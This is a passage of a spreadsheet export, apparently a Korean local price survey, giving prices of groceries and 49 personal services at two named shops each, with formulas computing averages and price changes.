[21,"달걀","특란 30개 한판",{"$f":"COUNTIF(J27,\"<>0\")+COUNTIF(N27,\"<>0\")","v":2},{"$f":"COUNTIF(K27,\"<>0\")+COUNTIF(O27,\"<>0\")","v":2},{"$f":"IF(D27=0,0,SUM(J27,N27)/D27)","v":6195},{"$f":"IF(E27=0,0,SUM(K27,O27)/E27)","v":7545},{"$f":"G27-F27","v":1350},"농협하나로마트",4900,7600,{"$f":"K27-J27","v":2700},"홈플러스",7490,7490,{"$f":"O27-N27","v":0}]
[22,"조기","15cm 1마리",{"$f":"COUNTIF(J28,\"<>0\")+COUNTIF(N28,\"<>0\")","v":2},{"$f":"COUNTIF(K28,\"<>0\")+COUNTIF(O28,\"<>0\")","v":2},{"$f":"IF(D28=0,0,SUM(J28,N28)/D28)","v":2500},{"$f":"IF(E28=0,0,SUM(K28,O28)/E28)","v":1750},{"$f":"G28-F28","v":-750},"농협하나로마트",2500,1000,{"$f":"K28-J28","v":-1500},"홈플러스",2500,2500,{"$f":"O28-N28","v":0}]
[23,"갈치","60cm 1마리",{"$f":"COUNTIF(J29,\"<>0\")+COUNTIF(N29,\"<>0\")","v":2},{"$f":"COUNTIF(K29,\"<>0\")+COUNTIF(O29,\"<>0\")","v":2},{"$f":"IF(D29=0,0,SUM(J29,N29)/D29)","v":5900},{"$f":"IF(E29=0,0,SUM(K29,O29)/E29)","v":4550},{"$f":"G29-F29","v":-1350},"농협하나로마트",5200,2500,{"$f":"K29-J29","v":-2700},"홈플러스",6600,6600,{"$f":"O29-N29","v":0}]
[24,"명태","40cm 1마리",{"$f":"COUNTIF(J30,\"<>0\")+COUNTIF(N30,\"<>0\")","v":2},{"$f":"COUNTIF(K30,\"<>0\")+COUNTIF(O30,\"<>0\")","v":2},{"$f":"IF(D30=0,0,SUM(J30,N30)/D30)","v":4000},{"$f":"IF(E30=0,0,SUM(K30,O30)/E30)","v":4000},{"$f":"G30-F30","v":0},"농협하나로마트",3500,3500,{"$f":"K30-J30","v":0},"홈플러스",4500,4500,{"$f":"O30-N30","v":0}]
[25,"고등어","30cm 1마리",{"$f":"COUNTIF(J31,\"<>0\")+COUNTIF(N31,\"<>0\")","v":2},{"$f":"COUNTIF(K31,\"<>0\")+COUNTIF(O31,\"<>0\")","v":2},{"$f":"IF(D31=0,0,SUM(J31,N31)/D31)","v":5250},{"$f":"IF(E31=0,0,SUM(K31,O31)/E31)","v":5050},{"$f":"G31-F31","v":-200},"농협하나로마트",5000,4600,{"$f":"K31-J31","v":-400},"홈플러스",5500,5500,{"$f":"O31-N31","v":0}]
[26,"냉동오징어","30cm 1마리",{"$f":"COUNTIF(J32,\"<>0\")+COUNTIF(N32,\"<>0\")","v":2},{"$f":"COUNTIF(K32,\"<>0\")+COUNTIF(O32,\"<>0\")","v":2},{"$f":"IF(D32=0,0,SUM(J32,N32)/D32)","v":5600},{"$f":"IF(E32=0,0,SUM(K32,O32)/E32)","v":5600},{"$f":"G32-F32","v":0},"농협하나로마트",5700,5700,{"$f":"K32-J32","v":0},"홈플러스",5500,5500,{"$f":"O32-N32","v":0}]
[27,"콩","상품 1kg",{"$f":"COUNTIF(J33,\"<>0\")+COUNTIF(N33,\"<>0\")","v":2},{"$f":"COUNTIF(K33,\"<>0\")+COUNTIF(O33,\"<>0\")","v":2},{"$f":"IF(D33=0,0,SUM(J33,N33)/D33)","v":6030},{"$f":"IF(E33=0,0,SUM(K33,O33)/E33)","v":6030},{"$f":"G33-F33","v":0},"농협하나로마트",8560,8560,{"$f":"K33-J33","v":0},"홈플러스",3500,3500,0]
[28,"고춧가루","상품 3kg",{"$f":"COUNTIF(J34,\"<>0\")+COUNTIF(N34,\"<>0\")","v":2},{"$f":"COUNTIF(K34,\"<>0\")+COUNTIF(O34,\"<>0\")","v":2},{"$f":"IF(D34=0,0,SUM(J34,N34)/D34)","v":93900},{"$f":"IF(E34=0,0,SUM(K34,O34)/E34)","v":93900},{"$f":"G34-F34","v":0},"농협하나로마트",102000,102000,0,"홈플러스",85800,85800,{"$f":"O34-N34","v":0}]
["개인서비스 요금(49개 품목)"]
[1,"설렁탕","1인분 (보통)",{"$f":"COUNTIF(J36,\"<>0\")+COUNTIF(N36,\"<>0\")","v":2},{"$f":"COUNTIF(K36,\"<>0\")+COUNTIF(O36,\"<>0\")","v":2},{"$f":"IF(D36=0,0,SUM(J36,N36)/D36)","v":10500},{"$f":"IF(E36=0,0,SUM(K36,O36)/E36)","v":10500},{"$f":"G36-F36","v":0},"큰집설렁탕",10000,10000,{"$f":"K36-J36","v":0},"서울깍두기",11000,11000,{"$f":"O36-N36","v":0}]
[2,"냉면","물냉면, 1인분(보통)",{"$f":"COUNTIF(J37,\"<>0\")+COUNTIF(N37,\"<>0\")","v":2},{"$f":"COUNTIF(K37,\"<>0\")+COUNTIF(O37,\"<>0\")","v":2},{"$f":"IF(D37=0,0,SUM(J37,N37)/D37)","v":9500},{"$f":"IF(E37=0,0,SUM(K37,O37)/E37)","v":9500},{"$f":"G37-F37","v":0},"옥천냉면",9000,9000,{"$f":"K37-J37","v":0},"은성면옥",10000,10000,{"$f":"O37-N37","v":0}]
[3,"비빔밥","1인분(보통)",{"$f":"COUNTIF(J38,\"<>0\")+COUNTIF(N38,\"<>0\")","v":2},{"$f":"COUNTIF(K38,\"<>0\")+COUNTIF(O38,\"<>0\")","v":2},{"$f":"IF(D38=0,0,SUM(J38,N38)/D38)","v":7500},{"$f":"IF(E38=0,0,SUM(K38,O38)/E38)","v":7500},{"$f":"G38-F38","v":0},"백운마루",7000,7000,{"$f":"K38-J38","v":0},"고을팥죽",8000,8000,{"$f":"O38-N38","v":0}]
[4,"갈비탕","1인분(보통)",{"$f":"COUNTIF(J39,\"<>0\")+COUNTIF(N39,\"<>0\")","v":2},{"$f":"COUNTIF(K39,\"<>0\")+COUNTIF(O39,\"<>0\")","v":2},{"$f":"IF(D39=0,0,SUM(J39,N39)/D39)","v":13500},{"$f":"IF(E39=0,0,SUM(K39,O39)/E39)","v":13500},{"$f":"G39-F39","v":0},"청주본가",13000,13000,{"$f":"K39-J39","v":0},"은성면옥",14000,14000,{"$f":"O39-N39","v":0}]
[5,"삼계탕","1인분(보통)",{"$f":"COUNTIF(J40,\"<>0\")+COUNTIF(N40,\"<>0\")","v":2},{"$f":"COUNTIF(K40,\"<>0\")+COUNTIF(O40,\"<>0\")","v":2},{"$f":"IF(D40=0,0,SUM(J40,N40)/D40)","v":14500},{"$f":"IF(E40=0,0,SUM(K40,O40)/E40)","v":14500},{"$f":"G40-F40","v":0},"고려삼계탕",14000,14000,{"$f":"K40-J40","v":0},"석암정",15000,15000,{"$f":"O40-N40","v":0}]
[6,"된장찌개\n백반","1인분(보통)",{"$f":"COUNTIF(J41,\"<>0\")+COUNTIF(N41,\"<>0\")","v":2},{"$f":"COUNTIF(K41,\"<>0\")+COUNTIF(O41,\"<>0\")","v":2},{"$f":"IF(D41=0,0,SUM(J41,N41)/D41)","v":8500},{"$f":"IF(E41=0,0,SUM(K41,O41)/E41)","v":8500},{"$f":"G41-F41","v":0},"남이식당",8000,8000,{"$f":"K41-J41","v":0},"한일식당",9000,9000,{"$f":"O41-N41","v":0}]
[7,"김치찌개\n백반","1인분(보통)",{"$f":"COUNTIF(J42,\"<>0\")+COUNTIF(N42,\"<>0\")","v":2},{"$f":"COUNTIF(K42,\"<>0\")+COUNTIF(O42,\"<>0\")","v":2},{"$f":"IF(D42=0,0,SUM(J42,N42)/D42)","v":9000},{"$f":"IF(E42=0,0,SUM(K42,O42)/E42)","v":9000},{"$f":"G42-F42","v":0},"시골밥상",8000,8000,{"$f":"K42-J42","v":0},"한일식당",10000,10000,{"$f":"O42-N42","v":0}]
[8,"불고기","1인분(200g)\n공기밥 제외",{"$f":"COUNTIF(J43,\"<>0\")+COUNTIF(N43,\"<>0\")","v":2},{"$f":"COUNTIF(K43,\"<>0\")+COUNTIF(O43,\"<>0\")","v":2},{"$f":"IF(D43=0,0,SUM(J43,N43)/D43)","v":21000},{"$f":"IF(E43=0,0,SUM(K43,O43)/E43)","v":21000},{"$f":"G43-F43","v":0},"금정불고기",18000,18000,{"$f":"K43-J43","v":0},"한우관",24000,24000,{"$f":"O43-N43","v":0}]
[9,"등심구이","1인분(200g)\n공기밥 제외",{"$f":"COUNTIF(J44,\"<>0\")+COUNTIF(N44,\"<>0\")","v":2},{"$f":"COUNTIF(K44,\"<>0\")+COUNTIF(O44,\"<>0\")","v":2},{"$f":"IF(D44=0,0,SUM(J44,N44)/D44)","v":38000},{"$f":"IF(E44=0,0,SUM(K44,O44)/E44)","v":38000},{"$f":"G44-F44","v":0},"한마음회관",40000,40000,{"$f":"K44-J44","v":0},"한우관",36000,36000,{"$f":"O44-N44","v":0}]
[10,"생선초밥","1인분(보통), 활어기준",{"$f":"COUNTIF(J45,\"<>0\")+COUNTIF(N45,\"<>0\")","v":2},{"$f":"COUNTIF(K45,\"<>0\")+COUNTIF(O45,\"<>0\")","v":2},{"$f":"IF(D45=0,0,SUM(J45,N45)/D45)","v":12000},{"$f":"IF(E45=0,0,SUM(K45,O45)/E45)","v":12000},{"$f":"G45-F45","v":0},"거인초밥",12000,12000,{"$f":"K45-J45","v":0},"거북이초밥",12000,12000,{"$f":"O45-N45","v":0}]
[11,"튀김닭","양념통닭 1마리",{"$f":"COUNTIF(J46,\"<>0\")+COUNTIF(N46,\"<>0\")","v":2},{"$f":"COUNTIF(K46,\"<>0\")+COUNTIF(O46,\"<>0\")","v":2},{"$f":"IF(D46=0,0,SUM(J46,N46)/D46)","v":18500},{"$f":"IF(E46=0,0,SUM(K46,O46)/E46)","v":18500},{"$f":"G46-F46","v":0},"아주커치킨",18000,18000,{"$f":"K46-J46","v":0},"페리카나",19000,19000,{"$f":"O46-N46","v":0}]
[12,"칼국수","1인분(보통)",{"$f":"COUNTIF(J47,\"<>0\")+COUNTIF(N47,\"<>0\")","v":2},{"$f":"COUNTIF(K47,\"<>0\")+COUNTIF(O47,\"<>0\")","v":2},{"$f":"IF(D47=0,0,SUM(J47,N47)/D47)","v":7000},{"$f":"IF(E47=0,0,SUM(K47,O47)/E47)","v":7000},{"$f":"G47-F47","v":0},"소담칼국수",7000,7000,{"$f":"K47-J47","v":0},"민속칼국수",7000,7000,{"$f":"O47-N47","v":0}]
[13,"조리라면","분식점 1인분",{"$f":"COUNTIF(J48,\"<>0\")+COUNTIF(N48,\"<>0\")","v":2},{"$f":"COUNTIF(K48,\"<>0\")+COUNTIF(O48,\"<>0\")","v":2},{"$f":"IF(D48=0,0,SUM(J48,N48)/D48)","v":3650},{"$f":"IF(E48=0,0,SUM(K48,O48)/E48)","v":3650},{"$f":"G48-F48","v":0},"농협하나로분식",3500,3500,{"$f":"K48-J48","v":0},"고봉민김밥",3800,3800,{"$f":"O48-N48","v":0}]
[14,"김밥","분식점 1인분",{"$f":"COUNTIF(J49,\"<>0\")+COUNTIF(N49,\"<>0\")","v":2},{"$f":"COUNTIF(K49,\"<>0\")+COUNTIF(O49,\"<>0\")","v":2},{"$f":"IF(D49=0,0,SUM(J49,N49)/D49)","v":3750},{"$f":"IF(E49=0,0,SUM(K49,O49)/E49)","v":3750},{"$f":"G49-F49","v":0},"농협하나로분식",3000,3000,{"$f":"K49-J49","v":0},"김가네",4500,4500,{"$f":"O49-N49","v":0}]
[15,"짜장면","1인분(보통)",{"$f":"COUNTIF(J50,\"<>0\")+COUNTIF(N50,\"<>0\")","v":2},{"$f":"COUNTIF(K50,\"<>0\")+COUNTIF(O50,\"<>0\")","v":2},{"$f":"IF(D50=0,0,SUM(J50,N50)/D50)","v":7000},{"$f":"IF(E50=0,0,SUM(K50,O50)/E50)","v":7000},{"$f":"G50-F50","v":0},"마동짬뽕",7000,7000,{"$f":"K50-J50","v":0},"연경",7000,7000,{"$f":"O50-N50","v":0}]
[16,"짬뽕","1인분(보통)",{"$f":"COUNTIF(J51,\"<>0\")+COUNTIF(N51,\"<>0\")","v":2},{"$f":"COUNTIF(K51,\"<>0\")+COUNTIF(O51,\"<>0\")","v":2},{"$f":"IF(D51=0,0,SUM(J51,N51)/D51)","v":9000},{"$f":"IF(E51=0,0,SUM(K51,O51)/E51)","v":9000},{"$f":"G51-F51","v":0},"마동짬뽕",10000,10000,{"$f":"K51-J51","v":0},"연경",8000,8000,{"$f":"O51-N51","v":0}]
[17,"탕수육","일반탕수육(보통)",{"$f":"COUNTIF(J52,\"<>0\")+COUNTIF(N52,\"<>0\")","v":2},{"$f":"COUNTIF(K52,\"<>0\")+COUNTIF(O52,\"<>0\")","v":2},{"$f":"IF(D52=0,0,SUM(J52,N52)/D52)","v":21500},{"$f":"IF(E52=0,0,SUM(K52,O52)/E52)","v":21500},{"$f":"G52-F52","v":0},"마동짬봉",22000,22000,{"$f":"K52-J52","v":0},"연경",21000,21000,{"$f":"O52-N52","v":0}]
[18,"돈가스","일반돈가스,1인분",{"$f":"COUNTIF(J53,\"<>0\")+COUNTIF(N53,\"<>0\")","v":2},{"$f":"COUNTIF(K53,\"<>0\")+COUNTIF(O53,\"<>0\")","v":2},{"$f":"IF(D53=0,0,SUM(J53,N53)/D53)","v":9750},{"$f":"IF(E53=0,0,SUM(K53,O53)/E53)","v":9750},{"$f":"G53-F53","v":0},"거인초밥",9000,9000,{"$f":"K53-J53","v":0},"스타카츠",10500,10500,{"$f":"O53-N53","v":0}]
[19,"햄버거","기본형(야채,고기)",{"$f":"COUNTIF(J54,\"<>0\")+COUNTIF(N54,\"<>0\")","v":2},{"$f":"COUNTIF(K54,\"<>0\")+COUNTIF(O54,\"<>0\")","v":2},{"$f":"IF(D54=0,0,SUM(J54,N54)/D54)","v":3150},{"$f":"IF(E54=0,0,SUM(K54,O54)/E54)","v":3150},{"$f":"G54-F54","v":0},"롯데리아중동점",3300,3300,{"$f":"K54-J54","v":0},"맥도날드 광양DT점",3000,3000,{"$f":"O54-N54","v":0}]
[20,"피자","기본형(야채,고기)",{"$f":"COUNTIF(J55,\"<>0\")+COUNTIF(N55,\"<>0\")","v":2},{"$f":"COUNTIF(K55,\"<>0\")+COUNTIF(O55,\"<>0\")","v":2},{"$f":"IF(D55=0,0,SUM(J55,N55)/D55)","v":18950},{"$f":"IF(E55=0,0,SUM(K55,O55)/E55)","v":18950},{"$f":"G55-F55","v":0},"임실치즈피자",22900,22900,{"$f":"K55-J55","v":0},"피자맨",15000,15000,{"$f":"O55-N55","v":0}]
[21,"커피(외식)","일반원두커피",{"$f":"COUNTIF(J56,\"<>0\")+COUNTIF(N56,\"<>0\")","v":2},{"$f":"COUNTIF(K56,\"<>0\")+COUNTIF(O56,\"<>0\")","v":2},{"$f":"IF(D56=0,0,SUM(J56,N56)/D56)","v":2900},{"$f":"IF(E56=0,0,SUM(K56,O56)/E56)","v":2900},{"$f":"G56-F56","v":0},"루앤비 마동점",2800,2800,{"$f":"K56-J56","v":0},"모닝",3000,3000,{"$f":"O56-N56","v":0}]
[22,"국산차(외식)","녹차(티백 또는 잎녹차)",{"$f":"COUNTIF(J57,\"<>0\")+COUNTIF(N57,\"<>0\")","v":2},{"$f":"COUNTIF(K57,\"<>0\")+COUNTIF(O57,\"<>0\")","v":2},{"$f":"IF(D57=0,0,SUM(J57,N57)/D57)","v":3400},{"$f":"IF(E57=0,0,SUM(K57,O57)/E57)","v":3400},{"$f":"G57-F57","v":0},"루앤비 마동점",2800,2800,{"$f":"K57-J57","v":0},"모닝",4000,4000,{"$f":"O57-N57","v":0}]
[23,"삼겹살","식육식당 200g(국내산)",{"$f":"COUNTIF(J58,\"<>0\")+COUNTIF(N58,\"<>0\")","v":2},{"$f":"COUNTIF(K58,\"<>0\")+COUNTIF(O58,\"<>0\")","v":2},{"$f":"IF(D58=0,0,SUM(J58,N58)/D58)","v":15500},{"$f":"IF(E58=0,0,SUM(K58,O58)/E58)","v":15500},{"$f":"G58-F58","v":0},"남부촌",15000,15000,{"$f":"K58-J58","v":0},"대한숯불고기",16000,16000,{"$f":"O58-N58","v":0}]
[24,"돼지갈비","식육식당 200g(국내산)",{"$f":"COUNTIF(J59,\"<>0\")+COUNTIF(N59,\"<>0\")","v":2},{"$f":"COUNTIF(K59,\"<>0\")+COUNTIF(O59,\"<>0\")","v":2},{"$f":"IF(D59=0,0,SUM(J59,N59)/D59)","v":11500},{"$f":"IF(E59=0,0,SUM(K59,O59)/E59)","v":11500},{"$f":"G59-F59","v":0},"남부촌",11000,11000,{"$f":"K59-J59","v":0},"대한숯불고기",12000,12000,{"$f":"O59-N59","v":0}]
[25,"쇠갈비","식육식당 200g(국내산)",{"$f":"COUNTIF(J60,\"<>0\")+COUNTIF(N60,\"<>0\")","v":2},{"$f":"COUNTIF(K60,\"<>0\")+COUNTIF(O60,\"<>0\")","v":2},{"$f":"IF(D60=0,0,SUM(J60,N60)/D60)","v":41000},{"$f":"IF(E60=0,0,SUM(K60,O60)/E60)","v":41000},{"$f":"G60-F60","v":0}," 하면옥",35000,35000,{"$f":"K60-J60","v":0},"은성면옥",47000,47000,{"$f":"O60-N60","v":0}]
[26,"생맥주","500CC 1잔",{"$f":"COUNTIF(J61,\"<>0\")+COUNTIF(N61,\"<>0\")","v":2},{"$f":"COUNTIF(K61,\"<>0\")+COUNTIF(O61,\"<>0\")","v":2},{"$f":"IF(D61=0,0,SUM(J61,N61)/D61)","v":3750},{"$f":"IF(E61=0,0,SUM(K61,O61)/E61)","v":3750},{"$f":"G61-F61","v":0},"꼬치니",3500,3500,{"$f":"K61-J61","v":0},"투모아",4000,4000,{"$f":"O61-N61","v":0}]
[27,"공동\n주택관리비","주공 18평1개월\n(공과금 제외)",{"$f":"COUNTIF(J62,\"<>0\")+COUNTIF(N62,\"<>0\")","v":2},{"$f":"COUNTIF(K62,\"<>0\")+COUNTIF(O62,\"<>0\")","v":2},{"$f":"IF(D62=0,0,SUM(J62,N62)/D62)","v":60000},{"$f":"IF(E62=0,0,SUM(K62,O62)/E62)","v":60000},{"$f":"G62-F62","v":0},"부영동광2차20평형",65000,65000,{"$f":"K62-J62","v":0},"금광아파트16평형",55000,55000,{"$f":"O62-N62","v":0}]
[28,"양 복\n세탁료","신사복 상·하\n드라이크리닝 1회",{"$f":"COUNTIF(J63,\"<>0\")+COUNTIF(N63,\"<>0\")","v":2},{"$f":"COUNTIF(K63,\"<>0\")+COUNTIF(O63,\"<>0\")","v":2},{"$f":"IF(D63=0,0,SUM(J63,N63)/D63)","v":10000},{"$f":"IF(E63=0,0,SUM(K63,O63)/E63)","v":10000},{"$f":"G63-F63","v":0},"소망세탁소",10000,10000,{"$f":"K63-J63","v":0},"무등세탁소",10000,10000,{"$f":"O63-N63","v":0}]
[29,"의복수선료","신사복 바지\n밑단줄임 1회",{"$f":"COUNTIF(J64,\"<>0\")+COUNTIF(N64,\"<>0\")","v":2},{"$f":"COUNTIF(K64,\"<>0\")+COUNTIF(O64,\"<>0\")","v":2},{"$f":"IF(D64=0,0,SUM(J64,N64)/D64)","v":6000},{"$f":"IF(E64=0,0,SUM(K64,O64)/E64)","v":6000},{"$f":"G64-F64","v":0},"소망세탁소",6000,6000,{"$f":"K64-J64","v":0},"무등세탁소",6000,6000,{"$f":"O64-N64","v":0}]
[30,"영화관람요\n(방화. 외화)","상영시간 100분정도 1회\n(입장세,문예진흥기금포함)",{"$f":"COUNTIF(J65,\"<>0\")+COUNTIF(N65,\"<>0\")","v":0},{"$f":"COUNTIF(K65,\"<>0\")+COUNTIF(O65,\"<>0\")","v":0},{"$f":"IF(D65=0,0,SUM(J65,N65)/D65)","v":0},{"$f":"IF(E65=0,0,SUM(K65,O65)/E65)","v":0},{"$f":"G65-F65","v":0},null,0,0,{"$f":"K65-J65","v":0},null,0,0,0]
[31,"경기장\n입장료","공공체육시설\n(성인 1인)",{"$f":"COUNTIF(J66,\"<>0\")+COUNTIF(N66,\"<>0\")","v":0},{"$f":"COUNTIF(K66,\"<>0\")+COUNTIF(O66,\"<>0\")","v":0},{"$f":"IF(D66=0,0,SUM(J66,N66)/D66)","v":0},{"$f":"IF(E66=0,0,SUM(K66,O66)/E66)","v":0},{"$f":"G66-F66","v":0},null,0,0,{"$f":"K66-J66","v":0},null,0,0,{"$f":"O66-N66","v":0}]
[32,"수영장\n이용료","일반성인 1회\n(체육기금 포함)",0,0,{"$f":"IF(D67=0,0,SUM(J67,N67)/D67)","v":0},{"$f":"IF(E67=0,0,SUM(K67,O67)/E67)","v":0},{"$f":"G67-F67","v":0},null,0,0,{"$f":"K67-J67","v":0},null,0,0,{"$f":"O67-N67","v":0}]
[33,"볼링장\n이용료","일반성인\n평일오후 1게임",{"$f":"COUNTIF(J68,\"<>0\")+COUNTIF(N68,\"<>0\")","v":1},{"$f":"COUNTIF(K68,\"<>0\")+COUNTIF(O68,\"<>0\")","v":1},{"$f":"IF(D68=0,0,SUM(J68,N68)/D68)","v":0},{"$f":"IF(E68=0,0,SUM(K68,O68)/E68)","v":0},{"$f":"G68-F68","v":0},{"$nulls":3},{"$f":"K68-J68","v":0},null,0,0,{"$f":"O68-N68","v":0}]
[34,"골프연습장\n이용료","초급(남자회원)1개월\n(레슨비 미포함)",{"$f":"COUNTIF(J69,\"<>0\")+COUNTIF(N69,\"<>0\")","v":2},{"$f":"COUNTIF(K69,\"<>0\")+COUNTIF(O69,\"<>0\")","v":2},{"$f":"IF(D69=0,0,SUM(J69,N69)/D69)","v":150000},{"$f":"IF(E69=0,0,SUM(K69,O69)/E69)","v":150000},{"$f":"G69-F69","v":0},"최은규골프클리닉",150000,150000,{"$f":"K69-J69","v":0},"미가로골프연습장",150000,150000,{"$f":"O69-N69","v":0}]
[35,"노래방\n이용료","일반인 저녁 1시간",{"$f":"COUNTIF(J70,\"<>0\")+COUNTIF(N70,\"<>0\")","v":2},{"$f":"COUNTIF(K70,\"<>0\")+COUNTIF(O70,\"<>0\")","v":2},{"$f":"IF(D70=0,0,SUM(J70,N70)/D70)","v":25000},{"$f":"IF(E70=0,0,SUM(K70,O70)/E70)","v":25000},{"$f":"G70-F70","v":0},"세븐노래방",25000,25000,{"$f":"K70-J70","v":0},"압구정노래연습장",25000,25000,{"$f":"O70-N70","v":0}]
[36,"당구장\n이용료","큐선대 일반인 저녁\n1시간",{"$f":"COUNTIF(J71,\"<>0\")+COUNTIF(N71,\"<>0\")","v":2},{"$f":"COUNTIF(K71,\"<>0\")+COUNTIF(O71,\"<>0\")","v":2},{"$f":"IF(D71=0,0,SUM(J71,N71)/D71)","v":10400},{"$f":"IF(E71=0,0,SUM(K71,O71)/E71)","v":10400},{"$f":"G71-F71","v":0},"세리당구장",10800,10800,{"$f":"K71-J71","v":0},"청솔당구장",10000,10000,{"$f":"O71-N71","v":0}]
[37,"사진촬영료","칼라 반명함 1조\n(상급사진관 3x4)",{"$f":"COUNTIF(J72,\"<>0\")+COUNTIF(N72,\"<>0\")","v":2},{"$f":"COUNTIF(K72,\"<>0\")+COUNTIF(O72,\"<>0\")","v":2},{"$f":"IF(D72=0,0,SUM(J72,N72)/D72)","v":15000},{"$f":"IF(E72=0,0,SUM(K72,O72)/E72)","v":15000},{"$f":"G72-F72","v":0},"세원스튜디오",15000,15000,{"$f":"K72-J72","v":0},"조민철사진이야기",15000,15000,{"$f":"O72-N72","v":0}]
[38,"사진인화료","디지털사진인화요금,\n현상료 포함",{"$f":"COUNTIF(J73,\"<>0\")+COUNTIF(N73,\"<>0\")","v":2},{"$f":"COUNTIF(K73,\"<>0\")+COUNTIF(O73,\"<>0\")","v":2},{"$f":"IF(D73=0,0,SUM(J73,N73)/D73)","v":300},{"$f":"IF(E73=0,0,SUM(K73,O73)/E73)","v":300},{"$f":"G73-F73","v":0},"세원스튜디오",300,300,{"$f":"K73-J73","v":0},"조민철사진이야기",300,300,{"$f":"O73-N73","v":0}]
[39,"영상매체대여료","최신판 영화 DVD대여요금",0,0,{"$f":"IF(D74=0,0,SUM(J74,N74)/D74)","v":0},{"$f":"IF(E74=0,0,SUM(K74,O74)/E74)","v":0},{"$f":"G74-F74","v":0},null,0,0,{"$f":"K74-J74","v":0},null,0,0,{"$f":"O74-N74","v":0}]
[40,"이용료(컷트)","성인조발 중류급 1회",{"$f":"COUNTIF(J75,\"<>0\")+COUNTIF(N75,\"<>0\")","v":2},{"$f":"COUNTIF(K75,\"<>0\")+COUNTIF(O75,\"<>0\")","v":2},{"$f":"IF(D75=0,0,SUM(J75,N75)/D75)","v":18000},{"$f":"IF(E75=0,0,SUM(K75,O75)/E75)","v":18000},{"$f":"G75-F75","v":0},"광명이용원",18000,18000,{"$f":"K75-J75","v":0},"농협이발소",18000,18000,{"$f":"O75-N75","v":0}]
[41,"미용료","성인여자 파마(일반)",{"$f":"COUNTIF(J76,\"<>0\")+COUNTIF(N76,\"<>0\")","v":2},{"$f":"COUNTIF(K76,\"<>0\")+COUNTIF(O76,\"<>0\")","v":2},{"$f":"IF(D76=0,0,SUM(J76,N76)/D76)","v":42500},{"$f":"IF(E76=0,0,SUM(K76,O76)/E76)","v":42500},{"$f":"G76-F76","v":0},"가위연가",40000,40000,{"$f":"K76-J76","v":0},"자르지오",45000,45000,{"$f":"O76-N76","v":0}]
[42,"목욕료\n(성인)","대중탕(성인 1회)\n(1회용품 제외)",{"$f":"COUNTIF(J77,\"<>0\")+COUNTIF(N77,\"<>0\")","v":1},{"$f":"COUNTIF(K77,\"<>0\")+COUNTIF(O77,\"<>0\")","v":1},{"$f":"IF(D77=0,0,SUM(J77,N77)/D77)","v":8000},{"$f":"IF(E77=0,0,SUM(K77,O77)/E77)","v":8000},{"$f":"G77-F77","v":0},null,0,0,{"$f":"K77-J77","v":0},"가야천사우나",8000,8000,{"$f":"O77-N77","v":0}]
[43,"숙박료\n(호텔)","평일, 스탠다드,부가세 및 봉사료 포함",{"$f":"COUNTIF(J78,\"<>0\")+COUNTIF(N78,\"<>0\")","v":1},{"$f":"COUNTIF(K78,\"<>0\")+COUNTIF(O78,\"<>0\")","v":1},{"$f":"IF(D78=0,0,SUM(J78,N78)/D78)","v":90000},{"$f":"IF(E78=0,0,SUM(K78,O78)/E78)","v":90000},{"$f":"G78-F78","v":0},"호텔락희 광양점",90000,90000,{"$f":"K78-J78","v":0},null,0,0,{"$f":"O78-N78","v":0}]
[44,"숙박료\n(여관)","독방, 1박, 욕탕부설",{"$f":"COUNTIF(J79,\"<>0\")+COUNTIF(N79,\"<>0\")","v":2},{"$f":"COUNTIF(K79,\"<>0\")+COUNTIF(O79,\"<>0\")","v":2},{"$f":"IF(D79=0,0,SUM(J79,N79)/D79)","v":52500},{"$f":"IF(E79=0,0,SUM(K79,O79)/E79)","v":52500},{"$f":"G79-F79","v":0},"보스톤",55000,55000,{"$f":"K79-J79","v":0},"블루밍모텔",50000,50000,{"$f":"O79-N79","v":0}]
[45,"콘도미니엄\n이용료","25평정도 회원기준\n1실 1일 사용",{"$f":"COUNTIF(J80,\"<>0\")+COUNTIF(N80,\"<>0\")","v":0},{"$f":"COUNTIF(K80,\"<>0\")+COUNTIF(O80,\"<>0\")","v":0},{"$f":"IF(D80=0,0,SUM(J80,N80)/D80)","v":0},{"$f":"IF(E80=0,0,SUM(K80,O80)/E80)","v":0},{"$f":"G80-F80","v":0},null,0,0,{"$f":"K80-J80","v":0},null,0,0,{"$f":"O80-N80","v":0}]
[46,"PC방\n이용료","1회 이용시",{"$f":"COUNTIF(J81,\"<>0\")+COUNTIF(N81,\"<>0\")","v":2},{"$f":"COUNTIF(K81,\"<>0\")+COUNTIF(O81,\"<>0\")","v":2},{"$f":"IF(D81=0,0,SUM(J81,N81)/D81)","v":1200},{"$f":"IF(E81=0,0,SUM(K81,O81)/E81)","v":1200},{"$f":"G81-F81","v":0},"딜라이트pc방",1200,1200,{"$f":"K81-J81","v":0},"크라우드pc방",1200,1200,{"$f":"O81-N81","v":0}]
[47,"택배이용료","20kg이하, 타지역",{"$f":"COUNTIF(J82,\"<>0\")+COUNTIF(N82,\"<>0\")","v":2},{"$f":"COUNTIF(K82,\"<>0\")+COUNTIF(O82,\"<>0\")","v":2},{"$f":"IF(D82=0,0,SUM(J82,N82)/D82)","v":6250},{"$f":"IF(E82=0,0,SUM(K82,O82)/E82)","v":6250},{"$f":"G82-F82","v":0},"우체국",6500,6500,{"$f":"K82-J82","v":0},"현대택배",6000,6000,{"$f":"O82-N82","v":0}]
[48,"찜질방\n이용료","찜질방(성인 1회)\n(1회용품 제외)",{"$f":"COUNTIF(J83,\"<>0\")+COUNTIF(N83,\"<>0\")","v":0},{"$f":"COUNTIF(K83,\"<>0\")+COUNTIF(O83,\"<>0\")","v":0},{"$f":"IF(D83=0,0,SUM(J83,N83)/D83)","v":0},{"$f":"IF(E83=0,0,SUM(K83,O83)/E83)","v":0},{"$f":"G83-F83","v":0},null,0,0,{"$f":"K83-J83","v":0},null,0,0,{"$f":"O83-N83","v":0}]
[49,"대입학원비(종합)","대입(4년제)재수생 종합반 수강료",{"$f":"COUNTIF(J84,\"<>0\")+COUNTIF(N84,\"<>0\")","v":0},{"$f":"COUNTIF(K84,\"<>0\")+COUNTIF(O84,\"<>0\")","v":0},{"$f":"IF(D84=0,0,SUM(J84,N84)/D84)","v":0},{"$f":"IF(E84=0,0,SUM(K84,O84)/E84)","v":0},{"$f":"G84-F84","v":0},null,0,0,{"$f":"K84-J84","v":0},null,0,0]
["공산품 등 기타(13개품목)"]
